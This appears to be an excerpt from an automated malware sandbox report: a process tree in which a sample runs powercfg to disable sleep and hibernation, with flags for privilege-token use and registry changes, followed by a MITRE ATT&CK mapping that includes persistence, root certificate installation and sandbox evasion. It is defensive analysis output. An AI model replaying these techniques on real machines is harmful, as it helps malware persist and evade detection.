  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1580
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

T1082

Virtualization/Sandbox Evasion